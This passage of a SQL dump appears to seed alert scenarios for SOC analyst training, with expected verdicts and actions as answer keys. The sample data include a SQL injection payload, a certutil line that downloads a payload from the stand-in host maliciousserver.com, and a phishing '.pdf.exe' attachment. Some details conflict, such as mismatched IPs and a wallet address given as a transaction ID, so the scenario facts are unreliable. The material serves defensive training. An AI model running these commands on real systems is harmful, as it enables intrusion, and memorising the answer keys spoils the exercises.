Detected\",\"date\":\"2026-02-01T20:32:22.413Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(766, 'SQL Injection Attack Detected on Web Application', 'critical', 'IDS/IPS', 'An attempted SQL injection attack was detected targeting the company\'s web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:22:45Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"\",\"hostname\":\"web-app\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-03-14 14:54:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 512 times for SQL injection attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL payload confirms an attempt to manipulate the database.\"}', 'Advanced', 'CORE', 8, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET 
/login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(767, 'Suspicious Network Activity from Internal IP Address', 'low', 'Firewall', 'A high volume of outbound connections detected from an internal IP, potentially indicating data exfiltration activity.', 'Data Exfiltration', 'T1048', 0, 'investigating', 183, '{\"timestamp\":\"2026-01-11T13:05:37Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.10\",\"dst_ip\":\"192.0.2.45\",\"username\":\"svc-data\",\"hostname\":\"DATA-SERVER\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-02-20 04:38:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the organization\'s data server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"External IP reported for suspicious data exfiltration activities.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The pattern of network activity aligns with typical data exfiltration behavior.\"}', 'Advanced', 'NDR', 8, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(768, 'False Positive - Routine Administrative Command Execution', 'low', 'Splunk', 'A routine administrative command was flagged due to its similarity to known malicious patterns.', 'False Positive', '', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:01Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.10.10.10\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"ADMIN-PC\",\"request_body\":\"\",\"command_line\":\"regsvr32.exe /i /n C:\\\\Windows\\\\System32\\\\sample.dll\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /i /n C:\\\\Windows\\\\System32\\\\sample.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Command is a legitimate administrative tool usage.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"false_positive\",\"analysis_notes\":\"The command is consistent with routine administrative tasks.\"}', 'Advanced', 'EDR', 8, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n 
C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(769, 'False Positive - Misconfigured Security Tool Trigger', 'medium', 'IDS/IPS', 'An internal misconfiguration caused a legitimate traffic flow to be flagged as suspicious.', 'False Positive', '', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:45:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.30\",\"username\":\"svc-network\",\"hostname\":\"NET-SERVER\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"false_positive\",\"analysis_notes\":\"The network connection is between two internal IPs and is expected behavior.\"}', 'Advanced', 'NDR', 8, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.417Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:45:22Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"svc-network\\\",\\\"hostname\\\":\\\"NET-SERVER\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(770, 'C2 Communication Detected via Certutil', 'high', 'EDR', 'Detected suspicious network activity suggesting potential command-and-control communication using Certutil.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:32:08Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"maluser\",\"hostname\":\"INFECTED-HOST\",\"request_body\":\"\",\"command_line\":\"certutil.exe -urlcache -split -f http://maliciousserver.com/payload.exe\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://maliciousserver.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Certutil used for downloading malicious payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Certutil to download a payload from a known malicious server indicates C2 activity.\"}', 'Advanced', 'EDR', 8, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(771, 'Initial Access via Phishing Email', 'medium', 'Email Security Gateway Logs', 'A phishing email was identified targeting JBS Foods\' employees with the objective to gain initial access to the network. The email contained a malicious attachment disguised as a financial report.', 'Social Engineering', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"email_id\":\"1234567890\",\"sender_email\":\"finance-dept@jbsfoods-fake.com\",\"recipient_email\":\"john.doe@jbsfoods.com\",\"subject\":\"Quarterly Financial Report\",\"attachment\":\"Q3_Report_2023.docm\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign origin IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Emotet malware hash.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance-dept@jbsfoods-fake.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain registered recently and used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.419Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(772, 'Ransomware Deployment and Execution', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following initial access, the REvil ransomware was executed, leading to encryption of critical systems within JBS Foods\' network. This phase of the operation is crucial to disrupt and mitigate future incidents.', 'Malware Execution', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"1234567890\",\"event_type\":\"Ransomware Execution\",\"host_ip\":\"10.0.15.23\",\"attacker_ip\":\"185.92.220.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware.exe\",\"process_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware.exe\",\"action\":\"File encryption started\",\"files_encrypted\":[\"C:\\\\Work\\\\finance.xlsx\",\"C:\\\\Work\\\\contracts.docx\",\"C:\\\\Work\\\\presentation.pptx\"]}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with REvil ransomware operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Known hash for REvil ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint detection\",\"verdict\":\"malicious\",\"details\":\"Detected ransomware 
executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(773, 'Bitcoin Ransom Payment and Tracking - Transaction Analysis', 'medium', 'Blockchain Analysis Tools', 'After the ransomware attack on JBS Foods, a Bitcoin transaction was detected that corresponds to the ransom payment. Analysts will trace the transaction 3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1 and its association with known malicious activities. The objective is to explore how a portion of the funds was recovered by the FBI, emphasizing the role of financial forensics in cybercrime investigations.', 'Financial Transaction Tracing', 'T1589 - Gather Victim Identity Information', 1, 'new', NULL, '{\"transaction_id\":\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\",\"timestamp\":\"2023-09-14T15:32:10Z\",\"amount_btc\":11.5,\"source_wallet\":\"1JBSFoodWalletAddress\",\"destination_wallet\":\"1AttackerWalletAddress\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"associated_hashes\":[\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\",\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\"],\"filename\":\"RansomwarePayload.exe\",\"user\":\"jbs_admin\"}', '2026-01-11 23:33:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to previous ransomware activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RansomwarePayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Cisco Talos\",\"verdict\":\"malicious\",\"details\":\"Identified as a ransomware payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"3ke8iWq9kYxF3vF7bKX6Vh8e9PbXo1B8y1\\\",\\\"timestamp\\\":\\\"2023-09-14T15:32:10Z\\\",\\\"amount_btc\\\":11.5,\\\"source_wallet\\\":\\\"1JBSFoodWalletAddress\\\",\\\"destination_wallet\\\":\\\"1AttackerWalletAddress\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"associated_hashes\\\":[\\\"3a6ebf1a27c8f2bd2d6f8e6e5b9d4f1f\\\",\\\"8b2b1b18d4f4e5c6a2e1d7f8a9c3e6d5\\\"],\\\"filename\\\":\\\"RansomwarePayload.exe\\\",\\\"user\\\":\\\"jbs_admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.420Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 